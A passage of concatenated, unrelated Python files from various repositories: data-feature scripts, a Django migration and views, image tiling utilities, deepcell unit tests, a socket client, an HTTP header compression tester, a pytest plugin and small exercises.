pd.merge(test, feature, on=KEY, how='left').drop(KEY, axis=1) utils.to_feature(tmp.add_prefix(PREF+pref), '../feature_prev/test') return # ============================================================================= # main # ============================================================================= paths = [('../data/installments_payments', ''), ('../data/installments_payments_delay', 'delay_'), ('../data/installments_payments', 'notdelay_')] cont_types = [('Consumer loans', 'cons_'), ('Cash loans', 'cas_'), ('Revolving loans', 'rev_'), ('NA', 'nan_')] argss = [] for p in paths: for c in cont_types: print(p, c) path, pref1 = p cont_type, pref2 = c argss.append( [path, cont_type, pref1+pref2] ) pool = Pool(len(argss)) pool.map(aggregate, argss) pool.close() #============================================================================== utils.end(__file__) # Generated by Django 2.1.3 on 2018-12-04 06:39 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Article', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('article', models.TextField()), ('summary', models.TextField()), ('topic', models.IntegerField(blank=True, null=True)), ('url', models.CharField(max_length=256, unique=True)), ('title', models.CharField(blank=True, max_length=50)), ], options={ 'verbose_name': 'Article', 'verbose_name_plural': 'Articles', }, ), migrations.CreateModel( name='ArticleTopic', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('topicId', models.IntegerField(blank=True, null=True)), ('probability', models.FloatField(blank=True, null=True)), ], options={ 'verbose_name': 'ArticleTopic', 'verbose_name_plural': 'ArticleTopics', }, ), migrations.CreateModel( name='Link', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('url', models.CharField(max_length=256, unique=True)), ('visited', models.BooleanField(default=False)), ('article_fetched', models.BooleanField(default=False)), ], options={ 'verbose_name': 'Link', 'verbose_name_plural': 'Links', }, ), migrations.CreateModel( name='Topic', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('topic', models.IntegerField()), ('keyword', models.CharField(blank=True, max_length=50)), ('probability', models.FloatField(blank=True, null=True)), ], options={ 'verbose_name': 'Topic', 'verbose_name_plural': 'Topics', }, ), migrations.AddIndex( model_name='link', index=models.Index(fields=['url', 'visited'], name='crawler_lin_url_29a44c_idx'), ), migrations.AddIndex( model_name='link', index=models.Index(fields=['visited'], name='visited_idx'), ), migrations.AddField( model_name='articletopic', name='articleId', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='crawler.Article'), ), ] import matplotlib.patches as patches import matplotlib.pyplot as plt import numpy as np # TILING def get_tiles_positions(W, H, w, h, step_x=None, step_y=None): # if steps are not given, just the tile size step_x = step_x or w step_y = step_y or h used_w = ((W - w) // step_x + 1) * step_x used_h = ((H - h) // step_y + 1) * step_y return [(x, y) for x in range(0, used_w, step_x) for y in range(0, used_h, step_y)] def get_image_tiles(img: np.ndarray, w, h, step_x=None, step_y=None): """ Splits the given image in tiles of the specified weight and height; optionally giving a step for sliding tiles. It drops the remaining parts of the image that could not fit in a tile. It returns a list of "images" (numpy arrays). """ # make sure it's a numpy array -- it will fail if not possible im_h, im_w = img.shape[0], img.shape[1] pos = get_tiles_positions(im_w, im_h, w, h, step_x, step_y) tiles = [img[y:y + h, x:x + w] for (x, y) in pos] return tiles, pos def draw_tile_box(ax, pos, size, color='r', with_marker=False): rect = patches.Rectangle(pos, size, size, linewidth=1, edgecolor=color, facecolor='none') ax.add_patch(rect) if with_marker: marker = patches.Rectangle(pos, 10, 10, linewidth=1, edgecolor=color, facecolor=color) ax.add_patch(marker) def show_image_with_tiles(img: np.ndarray, tile_size: int, tile_pos: list) -> None: print('Image size: %s, total tiles: %d' % (img.shape, len(tile_pos))) fig, ax = plt.subplots(1, 1, figsize=(15, 8)) ax.axis('off') # show the image itself ax.imshow(img) for pos in tile_pos: draw_tile_box(ax, pos, tile_size) draw_tile_box(ax, (0, 0), tile_size, color='b') # coding=utf-8 from LxPreset import prsMethods # none = '' # def getAutoLoadMayaPlugs(): lis = [] # Common Plugs commonPlugLis = prsMethods.Project.mayaCommonPlugLoadNames() lis.extend(commonPlugLis) # Custom Plugs customPlugLis = prsMethods.Project.mayaCustomPlugLoadNames() if customPlugLis: lis.extend(customPlugLis) return lis <reponame>perilib/perilib-python-robotis-dynamixel2 import struct import perilib from .RobotisDynamixel2Protocol import * class RobotisDynamixel2ParserGenerator(perilib.StreamParserGenerator): def __init__(self, protocol_class=RobotisDynamixel2Protocol, stream=None): super().__init__(protocol_class, stream) self.last_instruction = None def _on_tx_packet(self, packet): # store instruction byte for reference self.last_instruction = packet.buffer[7] super()._on_tx_packet(packet) <reponame>jizhouh/deepcell-tf<gh_stars>100-1000 # Copyright 2016-2021 The <NAME> at the California Institute of # Technology (Caltech), with support from the Paul Allen Family Foundation, # Google, & National Institutes of Health (NIH) under Grant U24CA224309-01. # All rights reserved. # # Licensed under a modified Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.github.com/vanvalenlab/deepcell-tf/LICENSE # # The Work provided may be used for non-commercial academic purposes only. # For any other use of the Work, including commercial use, please contact: # <EMAIL> # # Neither the name of Caltech nor the names of its contributors may be used # to endorse or promote products derived from this software without specific # prior written permission. # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for transform_utils""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from skimage.measure import label from tensorflow.python.platform import test from tensorflow.keras import backend as K from deepcell.utils import transform_utils def _get_image(img_h=300, img_w=300): bias = np.random.rand(img_w, img_h) * 64 variance = np.random.rand(img_w, img_h) * (255 - 64) img = np.random.rand(img_w, img_h) * variance + bias return img def _generate_test_masks(): img_w = img_h = 30 mask_images = [] for _ in range(8): imarray = np.random.randint(2, size=(img_w, img_h, 1)) mask_images.append(imarray) return mask_images class TransformUtilsTest(test.TestCase): def test_pixelwise_transform_2d(self): with self.cached_session(): K.set_image_data_format('channels_last') # test single edge class for img in _generate_test_masks(): img = label(img) img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=False) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=1, data_format='channels_last', separate_edge_classes=False) self.assertEqual(pw_img.shape[-1], 3) self.assertEqual(pw_img_dil.shape[-1], 3) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) # test separate edge classes for img in _generate_test_masks(): img = label(img) img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=True) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=1, data_format='channels_last', separate_edge_classes=True) self.assertEqual(pw_img.shape[-1], 4) self.assertEqual(pw_img_dil.shape[-1], 4) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] + pw_img[..., 2], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) def test_pixelwise_transform_3d(self): frames = 10 img_list = [] for img in _generate_test_masks(): frame_list = [] for _ in range(frames): frame_list.append(label(img)) img_stack = np.array(frame_list) img_list.append(img_stack) with self.cached_session(): K.set_image_data_format('channels_last') # test single edge class maskstack = np.vstack(img_list) batch_count = maskstack.shape[0] // frames new_shape = tuple([batch_count, frames] + list(maskstack.shape[1:])) maskstack = np.reshape(maskstack, new_shape) for i in range(maskstack.shape[0]): img = maskstack[i, ...] img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=False) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=2, data_format='channels_last', separate_edge_classes=False) self.assertEqual(pw_img.shape[-1], 3) self.assertEqual(pw_img_dil.shape[-1], 3) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) # test separate edge classes maskstack = np.vstack(img_list) batch_count = maskstack.shape[0] // frames new_shape = tuple([batch_count, frames] + list(maskstack.shape[1:])) maskstack = np.reshape(maskstack, new_shape) for i in range(maskstack.shape[0]): img = maskstack[i, ...] img = np.squeeze(img) pw_img = transform_utils.pixelwise_transform( img, data_format=None, separate_edge_classes=True) pw_img_dil = transform_utils.pixelwise_transform( img, dilation_radius=2, data_format='channels_last', separate_edge_classes=True) self.assertEqual(pw_img.shape[-1], 4) self.assertEqual(pw_img_dil.shape[-1], 4) assert(np.all(np.equal(pw_img[..., 0] + pw_img[..., 1] + pw_img[..., 2], img > 0))) self.assertGreater( pw_img_dil[..., 0].sum() + pw_img_dil[..., 1].sum(), pw_img[..., 0].sum() + pw_img[..., 1].sum()) def test_outer_distance_transform_2d(self): for img in _generate_test_masks(): K.set_image_data_format('channels_last') bins = None distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 3 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 4 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) K.set_image_data_format('channels_first') img = np.rollaxis(img, -1, 1) bins = None distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 3 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 4 distance = transform_utils.outer_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) def test_outer_distance_transform_3d(self): mask_stack = np.array(_generate_test_masks()) unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) def test_outer_distance_transform_movie(self): mask_stack = np.array(_generate_test_masks()) unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.outer_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) def test_inner_distance_transform_2d(self): for img in _generate_test_masks(): K.set_image_data_format('channels_last') bins = None distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 3 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) bins = 4 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=-1).shape, img.shape) K.set_image_data_format('channels_first') img = np.rollaxis(img, -1, 1) bins = None distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 3 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) bins = 4 distance = transform_utils.inner_distance_transform_2d(img, bins=bins) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(np.expand_dims(distance, axis=1).shape, img.shape) def test_inner_distance_transform_3d(self): mask_stack = np.array(_generate_test_masks()) unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.inner_distance_transform_3d(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) def test_inner_distance_transform_movie(self): mask_stack = np.array(_generate_test_masks()) unique = np.zeros(mask_stack.shape) for i, mask in enumerate(_generate_test_masks()): unique[i] = label(mask) K.set_image_data_format('channels_last') bins = None distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=-1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=-1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) K.set_image_data_format('channels_first') unique = np.rollaxis(unique, -1, 1) bins = None distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) self.assertEqual(np.expand_dims(distance, axis=1).shape, unique.shape) bins = 3 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2])) self.assertEqual(distance.shape, unique.shape) bins = 4 distance = transform_utils.inner_distance_transform_movie(unique, bins=bins) distance = np.expand_dims(distance, axis=1) self.assertAllEqual(np.unique(distance), np.array([0, 1, 2, 3])) self.assertEqual(distance.shape, unique.shape) if __name__ == '__main__': test.main() <filename>imageServer/imageServer/client.py<gh_stars>0 import socket class Client: addr = None sock = None def __init__(self, address): self.addr = address self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) def connect(self, n): for retry in range(0, n): try: print(self.addr) self.sock.connect(self.addr) return True except Exception as e: print("Retry.") return False def register(self): self.sock.sendall("Registration 0".encode("ascii")) f = self.sock.makefile() f.flush() def send(self, data): self.sock.send(data) def close(self): self.sock.shutdown(socket.SHUT_RDWR) self.sock.close()#!/usr/bin/env python # encoding: utf-8 # # The MIT License (MIT) # # Copyright (c) 2013-2015 CNRS # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # # AUTHORS # <NAME> -- http://herve.niderb.fr/ from __future__ import unicode_literals from .command import CommandWrapper class MEncoder(CommandWrapper): """Rip previously dumped DVD. Parameters ---------- mencoder : str, optional. Absolute path to `mencoder` in case it is not reachable from PATH. """ def __init__(self, mencoder=None): if mencoder is None: mencoder = 'mencoder' super(MEncoder, self).__init__(mencoder) def vobsub(self, vobcopy_to, title, language, to): """ Extract vobsub from DVD title Parameters ---------- vobcopy_to : str Path to 'vobcopy' output title : int Title to process language : str Language code (e.g. "en", "fr", "es", "de") to : str Path to output (without extension) """ options = [ 'dvd://{title:d}'.format(title=title), '-dvd-device', vobcopy_to, # TVD/TheBigBangTheory/dvd/dump/Season01.Disc01 '-o', '/dev/null', '-nosound', '-ovc', 'copy', '-vobsubout', to, '-slang', language, ] self.run_command(options=options) <reponame>httpwg/compression-test #!/usr/bin/env python """ compression_test.py Tests various HTTP header compression algorithms, to compare them. """ # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. # pylint: disable=W0311 from collections import defaultdict from importlib import import_module import locale import optparse import operator from functools import reduce from lib.harfile import read_har_file from lib.processors import Processors class CompressionTester(object): """ This is the thing. """ msg_types = ['req', 'res'] streamifier_dir = "lib.streamifiers" def __init__(self, output): self.options, self.args = self.parse_options() if self.options.baseline is None: self.options.baseline = "http1" if not self.options.baseline in self.options.processor_names: new_processor_names = [self.options.baseline] new_processor_names.extend(self.options.processor_names) self.options.processor_names = new_processor_names self.output = output self.tsv_out = defaultdict(list) # accumulator for TSV output self.processors = Processors(self.options, self.msg_types, output) self.streamify = self.load_streamifier(self.options.streamifier) self.run() def run(self): "Let's do this thing." sessions = [] for filename in self.args: har_requests, har_responses = read_har_file(filename) messages = list(zip(har_requests, har_responses)) sessions.extend(self.streamify(messages)) for session in sessions: if self.options.verbose > 0: session.print_header(self.output) self.processors.process_session(session) if self.options.verbose > 0: session.print_summary(self.output, self.options.baseline) self.processors.done() for msg_type in self.msg_types: ttl_stream = reduce(operator.add, [s for s in sessions if s.msg_type == msg_type]) ttl_stream.name = "TOTAL" ttl_stream.print_header(self.output) ttl_stream.print_summary(self.output, self.options.baseline) if self.options.tsv: out = {} for msg_type in self.msg_types: out[msg_type] = [ open("%s%s" % (self.options.prefix, "%s.tsv" % msg_type), 'w'), 0 ] sessions[0].print_tsv_header(out[msg_type][0].write) for session in sessions: tsvfh, tsv_count = out[session.msg_type] out[session.msg_type][1] = session.print_tsv(tsvfh.write, tsv_count) for fh, count in list(out.values()): fh.close() def load_streamifier(self, name): "Load the streamifier specified in the options." return import_module("%s.%s" % (self.streamifier_dir, name)) \ .Streamifier([p.name for p in self.processors.processors['req']]) \ .streamify def parse_options(self): "Parse command-line options and return (options, args)." optp = optparse.OptionParser() optp.add_option('-v', '--verbose', type='int', dest='verbose', help='set verbosity, 1-5 (default: %default)', default=0, metavar='VERBOSITY') optp.add_option('-d', '--debug', action='store_true', dest="debug", help="debug mode. Stops on first header mismatch.", default=False) optp.add_option('-c', '--codec', action='append', dest='processor_names', help='compression modules to test, potentially with ' 'parameters. ' 'e.g. -c spdy3 -c fork="abc" ' '(default: %default)', default=[]) optp.add_option('-b', '--baseline', dest='baseline', help='baseline codec to base comparisons upon. ' '(default: %default)', default=None) optp.add_option('-t', '--tsv', action="store_true", dest="tsv", help="output TSV.", default=False) optp.add_option('-s', '--streamifier', dest="streamifier", help="streamifier module to use (default: %default).", default="public_suffix") optp.add_option('--prefix', action="store", dest="prefix", help="Prefix for TSV file output.", default="") return optp.parse_args() if __name__ == "__main__": import os import sys if os.name == "nt": locale.setlocale(locale.LC_ALL, 'english-us') else: locale.setlocale(locale.LC_ALL, 'en_US') CompressionTester(sys.stdout.write) import datetime import sys import traceback from django.http import HttpResponse, HttpResponseServerError from django.template import loader, Context from django.views.generic import TemplateView from chipy_org.apps.meetings.models import Meeting, RSVP from chipy_org.apps.meetings.forms import RSVPForm, AnonymousRSVPForm from chipy_org.apps.sponsors.models import GeneralSponsor from chipy_org.apps.announcements.models import Announcement class Home(TemplateView): template_name = 'homepage.html' def get_context_data(self, **kwargs): context = {} context.update(kwargs) # get upcoming main meeting future_meetings = Meeting.objects.filter( meeting_type__isnull=True).filter( when__gt=datetime.datetime.now() - datetime.timedelta(hours=6)) # get next 3 non-main meetings other_meetings = Meeting.objects.filter( meeting_type__isnull=False).filter( when__gt=datetime.datetime.now() - datetime.timedelta(hours=6) ).order_by('when')[:3] context['other_meetings'] = other_meetings context["general_sponsors"] = GeneralSponsor.objects.all( ).order_by('?') if future_meetings.count() == 0: context['next_meeting'] = False else: next_meeting = future_meetings.order_by('when')[0] context['next_meeting'] = next_meeting # Check if user and get rsvp if self.request.user.is_authenticated(): # Is there already an RSVP if RSVP.objects.filter( meeting=next_meeting, user=self.request.user).exists(): context['rsvp'] = RSVP.objects.get( meeting=next_meeting, user=self.request.user) else: context['rsvp'] = None context['rsvp_form'] = RSVPForm(self.request) else: context['rsvp_form'] = AnonymousRSVPForm(self.request) context['announcement'] = Announcement.objects.featured() return context def custom_500(request): template = loader.get_template('500.html') print(sys.exc_info()) etype, value, tback = sys.exc_info() return HttpResponseServerError(template.render(Context({ 'exception_value': value, 'value': etype, 'tb': traceback.format_exception(etype, value, tback)}))) def customer_404(request): return HttpResponse('<h1>404 - Page Not Found</h1>', status=404) import linecache import sys import textwrap from _pytest.config import hookimpl import _stories.compat import _stories.context import _stories.mounted # FIXME: Test me. origin_make_context = _stories.context.make_context def track_context(storage): def wrapper(contract, kwargs, history): ctx, ns, lines, bind = origin_make_context(contract, kwargs, history) storage.append((get_test_source(*get_test_call()), history, ns, lines)) return ctx, ns, lines, bind return wrapper def get_test_call(): f = sys._getframe() while True: if ( "@py_builtins" in f.f_globals and "@pytest_ar" in f.f_globals and f.f_code.co_filename != __file__ ): return f.f_code.co_filename, f.f_lineno elif not f.f_back: raise Exception("Can not find running test") else: f = f.f_back def get_test_source(filename, lineno): start = max(1, lineno - 3) end = lineno + 3 adjust_to = len(str(end)) lines = [linecache.getline(filename, no) for no in range(start, end)] text = textwrap.dedent("".join(lines)) src = [] for num, line in zip(range(start, end), text.splitlines()): sep = "->" if num == lineno else " " src.append((" {} {} {}".format(str(num).rjust(adjust_to), sep, line)).rstrip()) src = "\n".join(src) return src @hookimpl(hookwrapper=True) def pytest_runtest_call(item): storage = [] _stories.mounted.make_context = track_context(storage) yield _stories.mounted.make_context = origin_make_context for i, (src, history, ns, lines) in enumerate(storage, 1): output = "\n\n".join( [ src, _stories.context.history_representation(history) + "\n\n" + _stories.context.context_representation( ns, lines, _stories.compat.pformat ), ] ) item.add_report_section("call", "story #%d" % (i,), output) <filename>No_0169_Majority Element/majority_element_by_counter.py ''' Descption: Given an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times. You may assume that the array is non-empty and the majority element always exist in the array. Example 1: Input: [3,2,3] Output: 3 Example 2: Input: [2,2,1,1,1,2,2] Output: 2 ''' from typing import List from collections import Counter class Solution: def majorityElement(self, nums: List[int]) -> int: num_occ_dict = Counter(nums) # description guanatees that majority always exist for every test input. # Therefore, we can pick the one with highest occureence as majority element. return max( num_occ_dict, key = lambda k:num_occ_dict[k] ) # n : the length of input array nums ## Time Complexity: O( n ) # # The overhead in time is the dictionary building and maximal finding, which are of O( n ). ## Space Complexity: O( n ) # # The overhead in space is the storage for dictionary, num_occ_dict. def test_bench(): test_data = [ [3,2,3], [2,2,1,1,1,2,2] ] # expected output: ''' 3 2 ''' for test_array in test_data: print( Solution().majorityElement(test_array) ) return if __name__ == '__main__': test_bench()#!/usr/bin/python import sys def main(): cubes = [(value ** 3) for value in range(1, 11)] print(cubes) if __name__ == '__main__': main() sys.exit(0)<reponame>polowis/virtComp<gh_stars>0 from django.test import TestCase from app.models.core import User from app.models import Landscape, Land, Company, BuildingType, Place, Item, AgentCustomer from app.core.services.builders.agent_builder import AgentBuilder from app.core.services.builders.product_builder import ProductBuilder from app.core.services.builders.building_builder import BuildingBuilder from django.utils import timezone import datetime class ProductProcessBuilderTestCase(TestCase): def setUp(self): self.load_data() self.land: Landscape = Landscape.objects.create_land() self.user: User = User.objects.create_user('johnyTest', '<EMAIL>', '<PASSWORD>') self.company: Company = Company.objects.create_company('johnCompany', self.user) self.company.balance = self.land.buy_cost self.land.purchase_landscape(self.company) self.building = self.purchase_building() self.item: Item = self.get_sample_item() def purchase_building(self): mine: BuildingType = BuildingType.objects.get_building_by_type('supreme mine') self.company.balance = mine.get_buy_cost() building = BuildingBuilder.construct(mine.name, 'myfirstbuilding', self.company, 'buy', 0, self.land) return building def get_sample_item(self): return Item.objects.get(name='limestone') def load_data(self): Land.objects.load_land('csv_data/landData.csv') BuildingType.objects.load_building_type('csv_data/buildingType.csv') Place.objects.load_data('csv_data/place.csv') Item.objects.load_items('csv_data/item.csv') def hire_agents(self): builder: AgentBuilder = AgentBuilder(use_generator=False) builder.name = 'testJohny' builder.debug = False builder.continent = Land.objects.default_continent() agent = builder.build() self.company.hire(agent) def hire_many_agents(self): builder = AgentBuilder(use_generator=False) builder.debug = False builder.continent = Land.objects.default_continent() agents = builder.build_many_agents(2, ['alice', 'bob']) for agent in agents: self.company.hire(agent) return agents def test_product_process_builder_with_object(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = self.item product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() self.assertEqual(process.name, self.item.name) def test_product_process_builder_with_string(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() self.assertEqual(process.name, 'limestone') def test_process_complete(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) self.assertEqual(process.is_finished(time), True) def test_process_not_complete(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = process.end_time - datetime.timedelta(seconds=round(self.item.raw_producing_time / 2)) self.assertEqual(process.is_finished(time), False) def test_agent_updated_working_status(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents product_builder.produce_item() self.assertEqual(agents[0].is_producing, True) def test_agent_reset_working_status(self): agents = self.hire_many_agents() product_builder = ProductBuilder() product_builder.item = 'limestone' product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) process.is_finished(time) agent = AgentCustomer.objects.get(id=agents[0].id) self.assertEqual(agent.is_producing, False) def test_item_is_successfully_produce(self): agents = self.hire_many_agents() product_builder = ProductBuilder() self.item.probability_per_attempt = 100 # set to 100 to ensure the item always successfully produce product_builder.item = self.item product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) process.is_finished(time) self.assertEqual(process.is_success, True) def 